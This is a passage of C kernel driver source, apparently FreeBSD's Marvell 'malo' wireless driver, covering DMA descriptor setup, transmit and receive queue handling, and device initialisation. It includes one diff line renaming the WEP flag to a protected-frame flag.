sc->malo_imask) ^ sc->malo_imask) != 0) DPRINTF(sc, MALO_DEBUG_INTR, "%s: can't handle interrupt status 0x%x\n", __func__, status); #endif return (FILTER_HANDLED); } static void malo_load_cb(void *arg, bus_dma_segment_t *segs, int nsegs, int error) { bus_addr_t *paddr = (bus_addr_t*) arg; KASSERT(error == 0, ("error %u on bus_dma callback", error)); *paddr = segs->ds_addr; } static int malo_desc_setup(struct malo_softc *sc, const char *name, struct malo_descdma *dd, int nbuf, size_t bufsize, int ndesc, size_t descsize) { int error; struct ifnet *ifp = sc->malo_ifp; uint8_t *ds; DPRINTF(sc, MALO_DEBUG_RESET, "%s: %s DMA: %u bufs (%ju) %u desc/buf (%ju)\n", __func__, name, nbuf, (uintmax_t) bufsize, ndesc, (uintmax_t) descsize); dd->dd_name = name; dd->dd_desc_len = nbuf * ndesc * descsize; /* * Setup DMA descriptor area. */ error = bus_dma_tag_create(bus_get_dma_tag(sc->malo_dev),/* parent */ PAGE_SIZE, 0, /* alignment, bounds */ BUS_SPACE_MAXADDR_32BIT, /* lowaddr */ BUS_SPACE_MAXADDR, /* highaddr */ NULL, NULL, /* filter, filterarg */ dd->dd_desc_len, /* maxsize */ 1, /* nsegments */ dd->dd_desc_len, /* maxsegsize */ BUS_DMA_ALLOCNOW, /* flags */ NULL, /* lockfunc */ NULL, /* lockarg */ &dd->dd_dmat); if (error != 0) { if_printf(ifp, "cannot allocate %s DMA tag\n", dd->dd_name); return error; } /* allocate descriptors */ error = bus_dmamap_create(dd->dd_dmat, BUS_DMA_NOWAIT, &dd->dd_dmamap); if (error != 0) { if_printf(ifp, "unable to create dmamap for %s descriptors, " "error %u\n", dd->dd_name, error); goto fail0; } error = bus_dmamem_alloc(dd->dd_dmat, (void**) &dd->dd_desc, BUS_DMA_NOWAIT | BUS_DMA_COHERENT, &dd->dd_dmamap); if (error != 0) { if_printf(ifp, "unable to alloc memory for %u %s descriptors, " "error %u\n", nbuf * ndesc, dd->dd_name, error); goto fail1; } error = bus_dmamap_load(dd->dd_dmat, dd->dd_dmamap, dd->dd_desc, dd->dd_desc_len, malo_load_cb, &dd->dd_desc_paddr, BUS_DMA_NOWAIT); if (error != 0) { if_printf(ifp, "unable to map %s descriptors, error %u\n", dd->dd_name, error); goto fail2; } ds = dd->dd_desc; memset(ds, 0, dd->dd_desc_len); DPRINTF(sc, MALO_DEBUG_RESET, "%s: %s DMA map: %p (%lu) -> %p (%lu)\n", __func__, dd->dd_name, ds, (u_long) dd->dd_desc_len, (caddr_t) dd->dd_desc_paddr, /*XXX*/ (u_long) dd->dd_desc_len); return 0; fail2: bus_dmamem_free(dd->dd_dmat, dd->dd_desc, dd->dd_dmamap); fail1: bus_dmamap_destroy(dd->dd_dmat, dd->dd_dmamap); fail0: bus_dma_tag_destroy(dd->dd_dmat); memset(dd, 0, sizeof(*dd)); return error; } #define DS2PHYS(_dd, _ds) \ ((_dd)->dd_desc_paddr + ((caddr_t)(_ds) - (caddr_t)(_dd)->dd_desc)) static int malo_rxdma_setup(struct malo_softc *sc) { struct ifnet *ifp = sc->malo_ifp; int error, bsize, i; struct malo_rxbuf *bf; struct malo_rxdesc *ds; error = malo_desc_setup(sc, "rx", &sc->malo_rxdma, malo_rxbuf, sizeof(struct malo_rxbuf), 1, sizeof(struct malo_rxdesc)); if (error != 0) return error; /* * Allocate rx buffers and set them up. */ bsize = malo_rxbuf * sizeof(struct malo_rxbuf); bf = malloc(bsize, M_MALODEV, M_NOWAIT | M_ZERO); if (bf == NULL) { if_printf(ifp, "malloc of %u rx buffers failed\n", bsize); return error; } sc->malo_rxdma.dd_bufptr = bf; STAILQ_INIT(&sc->malo_rxbuf); ds = sc->malo_rxdma.dd_desc; for (i = 0; i < malo_rxbuf; i++, bf++, ds++) { bf->bf_desc = ds; bf->bf_daddr = DS2PHYS(&sc->malo_rxdma, ds); error = bus_dmamap_create(sc->malo_dmat, BUS_DMA_NOWAIT, &bf->bf_dmamap); if (error != 0) { if_printf(ifp, "%s: unable to dmamap for rx buffer, " "error %d\n", __func__, error); return error; } /* NB: tail is intentional to preserve descriptor order */ STAILQ_INSERT_TAIL(&sc->malo_rxbuf, bf, bf_list); } return 0; } static int malo_txdma_setup(struct malo_softc *sc, struct malo_txq *txq) { struct ifnet *ifp = sc->malo_ifp; int error, bsize, i; struct malo_txbuf *bf; struct malo_txdesc *ds; error = malo_desc_setup(sc, "tx", &txq->dma, malo_txbuf, sizeof(struct malo_txbuf), MALO_TXDESC, sizeof(struct malo_txdesc)); if (error != 0) return error; /* allocate and setup tx buffers */ bsize = malo_txbuf * sizeof(struct malo_txbuf); bf = malloc(bsize, M_MALODEV, M_NOWAIT | M_ZERO); if (bf == NULL) { if_printf(ifp, "malloc of %u tx buffers failed\n", malo_txbuf); return ENOMEM; } txq->dma.dd_bufptr = bf; STAILQ_INIT(&txq->free); txq->nfree = 0; ds = txq->dma.dd_desc; for (i = 0; i < malo_txbuf; i++, bf++, ds += MALO_TXDESC) { bf->bf_desc = ds; bf->bf_daddr = DS2PHYS(&txq->dma, ds); error = bus_dmamap_create(sc->malo_dmat, BUS_DMA_NOWAIT, &bf->bf_dmamap); if (error != 0) { if_printf(ifp, "unable to create dmamap for tx " "buffer %u, error %u\n", i, error); return error; } STAILQ_INSERT_TAIL(&txq->free, bf, bf_list); txq->nfree++; } return 0; } static void malo_desc_cleanup(struct malo_softc *sc, struct malo_descdma *dd) { bus_dmamap_unload(dd->dd_dmat, dd->dd_dmamap); bus_dmamem_free(dd->dd_dmat, dd->dd_desc, dd->dd_dmamap); bus_dmamap_destroy(dd->dd_dmat, dd->dd_dmamap); bus_dma_tag_destroy(dd->dd_dmat); memset(dd, 0, sizeof(*dd)); } static void malo_rxdma_cleanup(struct malo_softc *sc) { struct malo_rxbuf *bf; STAILQ_FOREACH(bf, &sc->malo_rxbuf, bf_list) { if (bf->bf_m != NULL) { m_freem(bf->bf_m); bf->bf_m = NULL; } if (bf->bf_dmamap != NULL) { bus_dmamap_destroy(sc->malo_dmat, bf->bf_dmamap); bf->bf_dmamap = NULL; } } STAILQ_INIT(&sc->malo_rxbuf); if (sc->malo_rxdma.dd_bufptr != NULL) { free(sc->malo_rxdma.dd_bufptr, M_MALODEV); sc->malo_rxdma.dd_bufptr = NULL; } if (sc->malo_rxdma.dd_desc_len != 0) malo_desc_cleanup(sc, &sc->malo_rxdma); } static void malo_txdma_cleanup(struct malo_softc *sc, struct malo_txq *txq) { struct malo_txbuf *bf; struct ieee80211_node *ni; STAILQ_FOREACH(bf, &txq->free, bf_list) { if (bf->bf_m != NULL) { m_freem(bf->bf_m); bf->bf_m = NULL; } ni = bf->bf_node; bf->bf_node = NULL; if (ni != NULL) { /* * Reclaim node reference. */ ieee80211_free_node(ni); } if (bf->bf_dmamap != NULL) { bus_dmamap_destroy(sc->malo_dmat, bf->bf_dmamap); bf->bf_dmamap = NULL; } } STAILQ_INIT(&txq->free); txq->nfree = 0; if (txq->dma.dd_bufptr != NULL) { free(txq->dma.dd_bufptr, M_MALODEV); txq->dma.dd_bufptr = NULL; } if (txq->dma.dd_desc_len != 0) malo_desc_cleanup(sc, &txq->dma); } static void malo_dma_cleanup(struct malo_softc *sc) { int i; for (i = 0; i < MALO_NUM_TX_QUEUES; i++) malo_txdma_cleanup(sc, &sc->malo_txq[i]); malo_rxdma_cleanup(sc); } static int malo_dma_setup(struct malo_softc *sc) { int error, i; /* rxdma initializing. */ error = malo_rxdma_setup(sc); if (error != 0) return error; /* NB: we just have 1 tx queue now. */ for (i = 0; i < MALO_NUM_TX_QUEUES; i++) { error = malo_txdma_setup(sc, &sc->malo_txq[i]); if (error != 0) { malo_dma_cleanup(sc); return error; } malo_txq_init(sc, &sc->malo_txq[i], i); } return 0; } static void malo_hal_set_rxtxdma(struct malo_softc *sc) { int i; malo_bar0_write4(sc, sc->malo_hwspecs.rxdesc_read, sc->malo_hwdma.rxdesc_read); malo_bar0_write4(sc, sc->malo_hwspecs.rxdesc_write, sc->malo_hwdma.rxdesc_read); for (i = 0; i < MALO_NUM_TX_QUEUES; i++) { malo_bar0_write4(sc, sc->malo_hwspecs.wcbbase[i], sc->malo_hwdma.wcbbase[i]); } } /* * Inform firmware of our tx/rx dma setup. The BAR 0 writes below are * for compatibility with older firmware. For current firmware we send * this information with a cmd block via malo_hal_sethwdma. */ static int malo_setup_hwdma(struct malo_softc *sc) { int i; struct malo_txq *txq; sc->malo_hwdma.rxdesc_read = sc->malo_rxdma.dd_desc_paddr; for (i = 0; i < MALO_NUM_TX_QUEUES; i++) { txq = &sc->malo_txq[i]; sc->malo_hwdma.wcbbase[i] = txq->dma.dd_desc_paddr; } sc->malo_hwdma.maxnum_txwcb = malo_txbuf; sc->malo_hwdma.maxnum_wcb = MALO_NUM_TX_QUEUES; malo_hal_set_rxtxdma(sc); return 0; } static void malo_txq_init(struct malo_softc *sc, struct malo_txq *txq, int qnum) { struct malo_txbuf *bf, *bn; struct malo_txdesc *ds; MALO_TXQ_LOCK_INIT(sc, txq); txq->qnum = qnum; txq->txpri = 0; /* XXX */ STAILQ_FOREACH(bf, &txq->free, bf_list) { bf->bf_txq = txq; ds = bf->bf_desc; bn = STAILQ_NEXT(bf, bf_list); if (bn == NULL) bn = STAILQ_FIRST(&txq->free); ds->physnext = htole32(bn->bf_daddr); } STAILQ_INIT(&txq->active); } /* * Reclaim resources for a setup queue. */ static void malo_tx_cleanupq(struct malo_softc *sc, struct malo_txq *txq) { /* XXX hal work? */ MALO_TXQ_LOCK_DESTROY(txq); } /* * Allocate a tx buffer for sending a frame. */ static struct malo_txbuf * malo_getbuf(struct malo_softc *sc, struct malo_txq *txq) { struct malo_txbuf *bf; MALO_TXQ_LOCK(txq); bf = STAILQ_FIRST(&txq->free); if (bf != NULL) { STAILQ_REMOVE_HEAD(&txq->free, bf_list); txq->nfree--; } MALO_TXQ_UNLOCK(txq); if (bf == NULL) { DPRINTF(sc, MALO_DEBUG_XMIT, "%s: out of xmit buffers on q %d\n", __func__, txq->qnum); sc->malo_stats.mst_tx_qstop++; } return bf; } static int malo_tx_dmasetup(struct malo_softc *sc, struct malo_txbuf *bf, struct mbuf *m0) { struct mbuf *m; int error; /* * Load the DMA map so any coalescing is done. This also calculates * the number of descriptors we need. */ error = bus_dmamap_load_mbuf_sg(sc->malo_dmat, bf->bf_dmamap, m0, bf->bf_segs, &bf->bf_nseg, BUS_DMA_NOWAIT); if (error == EFBIG) { /* XXX packet requires too many descriptors */ bf->bf_nseg = MALO_TXDESC + 1; } else if (error != 0) { sc->malo_stats.mst_tx_busdma++; m_freem(m0); return error; } /* * Discard null packets and check for packets that require too many * TX descriptors. We try to convert the latter to a cluster. */ if (error == EFBIG) { /* too many desc's, linearize */ sc->malo_stats.mst_tx_linear++; m = m_defrag(m0, M_NOWAIT); if (m == NULL) { m_freem(m0); sc->malo_stats.mst_tx_nombuf++; return ENOMEM; } m0 = m; error = bus_dmamap_load_mbuf_sg(sc->malo_dmat, bf->bf_dmamap, m0, bf->bf_segs, &bf->bf_nseg, BUS_DMA_NOWAIT); if (error != 0) { sc->malo_stats.mst_tx_busdma++; m_freem(m0); return error; } KASSERT(bf->bf_nseg <= MALO_TXDESC, ("too many segments after defrag; nseg %u", bf->bf_nseg)); } else if (bf->bf_nseg == 0) { /* null packet, discard */ sc->malo_stats.mst_tx_nodata++; m_freem(m0); return EIO; } DPRINTF(sc, MALO_DEBUG_XMIT, "%s: m %p len %u\n", __func__, m0, m0->m_pkthdr.len); bus_dmamap_sync(sc->malo_dmat, bf->bf_dmamap, BUS_DMASYNC_PREWRITE); bf->bf_m = m0; return 0; } #ifdef MALO_DEBUG static void malo_printrxbuf(const struct malo_rxbuf *bf, u_int ix) { const struct malo_rxdesc *ds = bf->bf_desc; uint32_t status = le32toh(ds->status); printf("R[%2u] (DS.V:%p DS.P:%p) NEXT:%08x DATA:%08x RC:%02x%s\n" " STAT:%02x LEN:%04x SNR:%02x NF:%02x CHAN:%02x" " RATE:%02x QOS:%04x\n", ix, ds, (const struct malo_desc *)bf->bf_daddr, le32toh(ds->physnext), le32toh(ds->physbuffdata), ds->rxcontrol, ds->rxcontrol != MALO_RXD_CTRL_DRIVER_OWN ? "" : (status & MALO_RXD_STATUS_OK) ? " *" : " !", ds->status, le16toh(ds->pktlen), ds->snr, ds->nf, ds->channel, ds->rate, le16toh(ds->qosctrl)); } static void malo_printtxbuf(const struct malo_txbuf *bf, u_int qnum, u_int ix) { const struct malo_txdesc *ds = bf->bf_desc; uint32_t status = le32toh(ds->status); printf("Q%u[%3u]", qnum, ix); printf(" (DS.V:%p DS.P:%p)\n", ds, (const struct malo_txdesc *)bf->bf_daddr); printf(" NEXT:%08x DATA:%08x LEN:%04x STAT:%08x%s\n", le32toh(ds->physnext), le32toh(ds->pktptr), le16toh(ds->pktlen), status, status & MALO_TXD_STATUS_USED ? "" : (status & 3) != 0 ? " *" : " !"); printf(" RATE:%02x PRI:%x QOS:%04x SAP:%08x FORMAT:%04x\n", ds->datarate, ds->txpriority, le16toh(ds->qosctrl), le32toh(ds->sap_pktinfo), le16toh(ds->format)); #if 0 { const uint8_t *cp = (const uint8_t *) ds; int i; for (i = 0; i < sizeof(struct malo_txdesc); i++) { printf("%02x ", cp[i]); if (((i+1) % 16) == 0) printf("\n"); } printf("\n"); } #endif } #endif /* MALO_DEBUG */ static __inline void malo_updatetxrate(struct ieee80211_node *ni, int rix) { #define N(x) (sizeof(x)/sizeof(x[0])) static const int ieeerates[] = { 2, 4, 11, 22, 44, 12, 18, 24, 36, 48, 96, 108 }; if (rix < N(ieeerates)) ni->ni_txrate = ieeerates[rix]; #undef N } static int malo_fix2rate(int fix_rate) { #define N(x) (sizeof(x)/sizeof(x[0])) static const int rates[] = { 2, 4, 11, 22, 12, 18, 24, 36, 48, 96, 108 }; return (fix_rate < N(rates) ? rates[fix_rate] : 0); #undef N } /* idiomatic shorthands: MS = mask+shift, SM = shift+mask */ #define MS(v,x) (((v) & x) >> x##_S) #define SM(v,x) (((v) << x##_S) & x) /* * Process completed xmit descriptors from the specified queue. */ static int malo_tx_processq(struct malo_softc *sc, struct malo_txq *txq) { struct malo_txbuf *bf; struct malo_txdesc *ds; struct ieee80211_node *ni; int nreaped; uint32_t status; DPRINTF(sc, MALO_DEBUG_TX_PROC, "%s: tx queue %u\n", __func__, txq->qnum); for (nreaped = 0;; nreaped++) { MALO_TXQ_LOCK(txq); bf = STAILQ_FIRST(&txq->active); if (bf == NULL) { MALO_TXQ_UNLOCK(txq); break; } ds = bf->bf_desc; MALO_TXDESC_SYNC(txq, ds, BUS_DMASYNC_POSTREAD | BUS_DMASYNC_POSTWRITE); if (ds->status & htole32(MALO_TXD_STATUS_FW_OWNED)) { MALO_TXQ_UNLOCK(txq); break; } STAILQ_REMOVE_HEAD(&txq->active, bf_list); MALO_TXQ_UNLOCK(txq); #ifdef MALO_DEBUG if (sc->malo_debug & MALO_DEBUG_XMIT_DESC) malo_printtxbuf(bf, txq->qnum, nreaped); #endif ni = bf->bf_node; if (ni != NULL) { status = le32toh(ds->status); if (status & MALO_TXD_STATUS_OK) { uint16_t format = le16toh(ds->format); uint8_t txant = MS(format, MALO_TXD_ANTENNA); sc->malo_stats.mst_ant_tx[txant]++; if (status & MALO_TXD_STATUS_OK_RETRY) sc->malo_stats.mst_tx_retries++; if (status & MALO_TXD_STATUS_OK_MORE_RETRY) sc->malo_stats.mst_tx_mretries++; malo_updatetxrate(ni, ds->datarate); sc->malo_stats.mst_tx_rate = ds->datarate; } else { if (status & MALO_TXD_STATUS_FAILED_LINK_ERROR) sc->malo_stats.mst_tx_linkerror++; if (status & MALO_TXD_STATUS_FAILED_XRETRY) sc->malo_stats.mst_tx_xretries++; if (status & MALO_TXD_STATUS_FAILED_AGING) sc->malo_stats.mst_tx_aging++; } /* * Do any tx complete callback. Note this must * be done before releasing the node reference. * XXX no way to figure out if frame was ACK'd */ if (bf->bf_m->m_flags & M_TXCB) { /* XXX strip fw len in case header inspected */ m_adj(bf->bf_m, sizeof(uint16_t)); ieee80211_process_callback(ni, bf->bf_m, (status & MALO_TXD_STATUS_OK) == 0); } /* * Reclaim reference to node. * * NB: the node may be reclaimed here if, for example * this is a DEAUTH message that was sent and the * node was timed out due to inactivity. */ ieee80211_free_node(ni); } ds->status = htole32(MALO_TXD_STATUS_IDLE); ds->pktlen = htole32(0); bus_dmamap_sync(sc->malo_dmat, bf->bf_dmamap, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->malo_dmat, bf->bf_dmamap); m_freem(bf->bf_m); bf->bf_m = NULL; bf->bf_node = NULL; MALO_TXQ_LOCK(txq); STAILQ_INSERT_TAIL(&txq->free, bf, bf_list); txq->nfree++; MALO_TXQ_UNLOCK(txq); } return nreaped; } /* * Deferred processing of transmit interrupt. */ static void malo_tx_proc(void *arg, int npending) { struct malo_softc *sc = arg; struct ifnet *ifp = sc->malo_ifp; int i, nreaped; /* * Process each active queue. */ nreaped = 0; for (i = 0; i < MALO_NUM_TX_QUEUES; i++) { if (!STAILQ_EMPTY(&sc->malo_txq[i].active)) nreaped += malo_tx_processq(sc, &sc->malo_txq[i]); } if (nreaped != 0) { ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; sc->malo_timer = 0; malo_start(ifp); } } static int malo_tx_start(struct malo_softc *sc, struct ieee80211_node *ni, struct malo_txbuf *bf, struct mbuf *m0) { #define IEEE80211_DIR_DSTODS(wh) \ ((wh->i_fc[1] & IEEE80211_FC1_DIR_MASK) == IEEE80211_FC1_DIR_DSTODS) #define IS_DATA_FRAME(wh) \ ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK)) == IEEE80211_FC0_TYPE_DATA) int error, ismcast, iswep; int copyhdrlen, hdrlen, pktlen; struct ieee80211_frame *wh; struct ifnet *ifp = sc->malo_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct malo_txdesc *ds; struct malo_txrec *tr; struct malo_txq *txq; uint16_t qos; wh = mtod(m0, struct ieee80211_frame *); - iswep = wh->i_fc[1] & IEEE80211_FC1_WEP; + iswep = wh->i_fc[1] & IEEE80211_FC1_PROTECTED; ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); copyhdrlen = hdrlen = ieee80211_anyhdrsize(wh); pktlen = m0->m_pkthdr.len; if (IEEE80211_QOS_HAS_SEQ(wh)) { if (IEEE80211_DIR_DSTODS(wh)) { qos = *(uint16_t *) (((struct ieee80211_qosframe_addr4 *) wh)->i_qos); copyhdrlen -= sizeof(qos); } else qos = *(uint16_t *) (((struct ieee80211_qosframe *) wh)->i_qos); } else qos = 0; if (iswep) { struct ieee80211_key *k; /* * Construct the 802.11 header+trailer for an encrypted * frame. The only reason this can fail is because of an * unknown or unsupported cipher/key type. * * NB: we do this even though the firmware will ignore * what we've done for WEP and TKIP as we need the * ExtIV filled in for CCMP and this also adjusts * the headers which simplifies our work below. */ k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { /* * This can happen when the key is yanked after the * frame was queued. Just discard the frame; the * 802.11 layer counts failures and provides * debugging/diagnostics. */ m_freem(m0); return EIO; } /* * Adjust the packet length for the crypto additions * done during encap and any other bits that the f/w * will add later on. */ pktlen = m0->m_pkthdr.len; /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } if (ieee80211_radiotap_active_vap(vap)) { sc->malo_tx_th.wt_flags = 0; /* XXX */ if (iswep) sc->malo_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_WEP; sc->malo_tx_th.wt_txpower = ni->ni_txpower; sc->malo_tx_th.wt_antenna = sc->malo_txantenna; ieee80211_radiotap_tx(vap, m0); } /* * Copy up/down the 802.11 header; the firmware requires * we present a 2-byte payload length followed by a * 4-address header (w/o QoS), followed (optionally) by * any WEP/ExtIV header (but only filled in for CCMP). * We are assured the mbuf has sufficient headroom to * prepend in-place by the setup of ic_headroom in * malo_attach. */ if (hdrlen < sizeof(struct malo_txrec)) { const int space = sizeof(struct malo_txrec) - hdrlen; if (M_LEADINGSPACE(m0) < space) { /* NB: should never happen */ device_printf(sc->malo_dev, "not enough headroom, need %d found %zd, " "m_flags 0x%x m_len %d\n", space, M_LEADINGSPACE(m0), m0->m_flags, m0->m_len); ieee80211_dump_pkt(ic, mtod(m0, const uint8_t *), m0->m_len, 0, -1); m_freem(m0); /* XXX stat */ return EIO; } M_PREPEND(m0, space, M_NOWAIT); } tr = mtod(m0, struct malo_txrec *); if (wh != (struct ieee80211_frame *) &tr->wh) ovbcopy(wh, &tr->wh, hdrlen); /* * Note: the "firmware length" is actually the length of the fully * formed "802.11 payload". That is, it's everything except for * the 802.11 header. In particular this includes all crypto * material including the MIC! */ tr->fwlen = htole16(pktlen - hdrlen); /* * Load the DMA map so any coalescing is done. This * also calculates the number of descriptors we need. */ error = malo_tx_dmasetup(sc, bf, m0); if (error != 0) return error; bf->bf_node = ni; /* NB: held reference */ m0 = bf->bf_m; /* NB: may have changed */ tr = mtod(m0, struct malo_txrec *); wh = (struct ieee80211_frame *)&tr->wh; /* * Formulate tx descriptor. */ ds = bf->bf_desc; txq = bf->bf_txq; ds->qosctrl = qos; /* NB: already little-endian */ ds->pktptr = htole32(bf->bf_segs[0].ds_addr); ds->pktlen = htole16(bf->bf_segs[0].ds_len); /* NB: pPhysNext setup once, don't touch */ ds->datarate = IS_DATA_FRAME(wh) ? 1 : 0; ds->sap_pktinfo = 0; ds->format = 0; /* * Select transmit rate. */ switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_MGT: sc->malo_stats.mst_tx_mgmt++; /* fall thru... */ case IEEE80211_FC0_TYPE_CTL: ds->txpriority = 1; break; case IEEE80211_FC0_TYPE_DATA: ds->txpriority = txq->qnum; break; default: if_printf(ifp, "bogus frame type 0x%x (%s)\n", wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK, __func__); /* XXX statistic */ m_freem(m0); return EIO; } #ifdef MALO_DEBUG if (IFF_DUMPPKTS_XMIT(sc)) ieee80211_dump_pkt(ic, mtod(m0, const uint8_t *)+sizeof(uint16_t), m0->m_len - sizeof(uint16_t), ds->datarate, -1); #endif MALO_TXQ_LOCK(txq); if (!IS_DATA_FRAME(wh)) ds->status |= htole32(1); ds->status |= htole32(MALO_TXD_STATUS_FW_OWNED); STAILQ_INSERT_TAIL(&txq->active, bf, bf_list); MALO_TXDESC_SYNC(txq, ds, BUS_DMASYNC_PREREAD | BUS_DMASYNC_PREWRITE); ifp->if_opackets++; sc->malo_timer = 5; MALO_TXQ_UNLOCK(txq); return 0; #undef IEEE80211_DIR_DSTODS } static void malo_start(struct ifnet *ifp) { struct malo_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct malo_txq *txq = &sc->malo_txq[0]; struct malo_txbuf *bf = NULL; struct mbuf *m; int nqueued = 0; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || sc->malo_invalid) return; for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; bf = malo_getbuf(sc, txq); if (bf == NULL) { IFQ_DRV_PREPEND(&ifp->if_snd, m); /* XXX blocks other traffic */ ifp->if_drv_flags |= IFF_DRV_OACTIVE; sc->malo_stats.mst_tx_qstop++; break; } /* * Pass the frame to the h/w for transmission. */ if (malo_tx_start(sc, ni, bf, m)) { ifp->if_oerrors++; if (bf != NULL) { bf->bf_m = NULL; bf->bf_node = NULL; MALO_TXQ_LOCK(txq); STAILQ_INSERT_HEAD(&txq->free, bf, bf_list); MALO_TXQ_UNLOCK(txq); } ieee80211_free_node(ni); continue; } nqueued++; if (nqueued >= malo_txcoalesce) { /* * Poke the firmware to process queued frames; * see below about (lack of) locking. */ nqueued = 0; malo_hal_txstart(sc->malo_mh, 0/*XXX*/); } } if (nqueued) { /* * NB: We don't need to lock against tx done because * this just prods the firmware to check the transmit * descriptors. The firmware will also start fetching * descriptors by itself if it notices new ones are * present when it goes to deliver a tx done interrupt * to the host. So if we race with tx done processing * it's ok. Delivering the kick here rather than in * malo_tx_start is an optimization to avoid poking the * firmware for each packet. * * NB: the queue id isn't used so 0 is ok. */ malo_hal_txstart(sc->malo_mh, 0/*XXX*/); } } static void malo_watchdog(void *arg) { struct malo_softc *sc; struct ifnet *ifp; sc = arg; callout_reset(&sc->malo_watchdog_timer, hz, malo_watchdog, sc); if (sc->malo_timer == 0 || --sc->malo_timer > 0) return; ifp = sc->malo_ifp; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) && !sc->malo_invalid) { if_printf(ifp, "watchdog timeout\n"); /* XXX no way to reset h/w. now */ ifp->if_oerrors++; sc->malo_stats.mst_watchdog++; } } static int malo_hal_reset(struct malo_softc *sc) { static int first = 0; struct ifnet *ifp = sc->malo_ifp; struct ieee80211com *ic = ifp->if_l2com; struct malo_hal *mh = sc->malo_mh; if (first == 0) { /* * NB: when the device firstly is initialized, sometimes * firmware could override rx/tx dma registers so we re-set * these values once. */ malo_hal_set_rxtxdma(sc); first = 1; } malo_hal_setantenna(mh, MHA_ANTENNATYPE_RX, sc->malo_rxantenna); malo_hal_setantenna(mh, MHA_ANTENNATYPE_TX, sc->malo_txantenna); malo_hal_setradio(mh, 1, MHP_AUTO_PREAMBLE); malo_chan_set(sc, ic->ic_curchan); /* XXX needs other stuffs? */ return 1; } static __inline struct mbuf * malo_getrxmbuf(struct malo_softc *sc, struct malo_rxbuf *bf) { struct mbuf *m; bus_addr_t paddr; int error; /* XXX don't need mbuf, just dma buffer */ m = m_getjcl(M_NOWAIT, MT_DATA, M_PKTHDR, MJUMPAGESIZE); if (m == NULL) { sc->malo_stats.mst_rx_nombuf++; /* XXX */ return NULL; } error = bus_dmamap_load(sc->malo_dmat, bf->bf_dmamap, mtod(m, caddr_t), MJUMPAGESIZE, malo_load_cb, &paddr, BUS_DMA_NOWAIT); if (error != 0) { if_printf(sc->malo_ifp, "%s: bus_dmamap_load failed, error %d\n", __func__, error); m_freem(m); return NULL; } bf->bf_data = paddr; bus_dmamap_sync(sc->malo_dmat, bf->bf_dmamap, BUS_DMASYNC_PREWRITE); return m; } static int malo_rxbuf_init(struct malo_softc *sc, struct malo_rxbuf *bf) { struct malo_rxdesc *ds; ds = bf->bf_desc; if (bf->bf_m == NULL) { bf->bf_m = malo_getrxmbuf(sc, bf); if (bf->bf_m == NULL) { /* mark descriptor to be skipped */ ds->rxcontrol = MALO_RXD_CTRL_OS_OWN; /* NB: don't need PREREAD */ MALO_RXDESC_SYNC(sc, ds, BUS_DMASYNC_PREWRITE); return ENOMEM; } } /* * Setup descriptor. */ ds->qosctrl = 0; ds->snr = 0; ds->status = MALO_RXD_STATUS_IDLE; ds->channel = 0; ds->pktlen = htole16(MALO_RXSIZE); ds->nf = 0; ds->physbuffdata = htole32(bf->bf_data); /* NB: don't touch pPhysNext, set once */ ds->rxcontrol = MALO_RXD_CTRL_DRIVER_OWN; MALO_RXDESC_SYNC(sc, ds, BUS_DMASYNC_PREREAD | BUS_DMASYNC_PREWRITE); return 0; } /* * Setup the rx data structures. This should only be done once or we may get * out of sync with the firmware. */ static int malo_startrecv(struct malo_softc *sc) { struct malo_rxbuf *bf, *prev; struct malo_rxdesc *ds; if (sc->malo_recvsetup == 1) { malo_mode_init(sc); /* set filters, etc. */ return 0; } prev = NULL; STAILQ_FOREACH(bf, &sc->malo_rxbuf, bf_list) { int error = malo_rxbuf_init(sc, bf); if (error != 0) { DPRINTF(sc, MALO_DEBUG_RECV, "%s: malo_rxbuf_init failed %d\n", __func__, error); return error; } if (prev != NULL) { ds = prev->bf_desc; ds->physnext = htole32(bf->bf_daddr); } prev = bf; } if (prev != NULL) { ds = prev->bf_desc; ds->physnext = htole32(STAILQ_FIRST(&sc->malo_rxbuf)->bf_daddr); } sc->malo_recvsetup = 1; malo_mode_init(sc); /* set filters, etc. */ return 0; } static void malo_init_locked(struct malo_softc *sc) { struct ifnet *ifp = sc->malo_ifp; struct malo_hal *mh = sc->malo_mh; int error; DPRINTF(sc, MALO_DEBUG_ANY, "%s: if_flags 0x%x\n", __func__, ifp->if_flags); MALO_LOCK_ASSERT(sc); /* * Stop anything previously setup. This is safe whether this is * the first time through or not. */ malo_stop_locked(ifp, 0); /* * Push state to the firmware. */ if (!malo_hal_reset(sc)) { if_printf(ifp, "%s: unable to reset hardware\n", __func__); return; } /* * Setup recv (once); transmit is already good to go. */ error = malo_startrecv(sc); if (error != 0) { if_printf(ifp, "%s: unable to start recv logic, error %d\n", __func__, error); return; } /* * Enable interrupts. */ sc->malo_imask = MALO_A2HRIC_BIT_RX_RDY | MALO_A2HRIC_BIT_TX_DONE | MALO_A2HRIC_BIT_OPC_DONE | MALO_A2HRIC_BIT_MAC_EVENT | MALO_A2HRIC_BIT_RX_PROBLEM | MALO_A2HRIC_BIT_ICV_ERROR | MALO_A2HRIC_BIT_RADAR_DETECT | MALO_A2HRIC_BIT_CHAN_SWITCH; ifp->if_drv_flags |= IFF_DRV_RUNNING; malo_hal_intrset(mh, sc->malo_imask); callout_reset(&sc->malo_watchdog_timer, hz, malo_watchdog, sc); } static void malo_init(void *arg) { struct malo_softc *sc = (struct malo_softc *) arg; struct ifnet *ifp = sc->malo_ifp; struct ieee80211com *ic = ifp->if_l2com; DPRINTF(sc, MALO_DEBUG_ANY, "%s: if_flags 0x%x\n", __func__, ifp->if_flags); MALO_LOCK(sc); malo_init_locked(sc); MALO_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } /* * Set the multicast filter contents into the hardware. */ static void 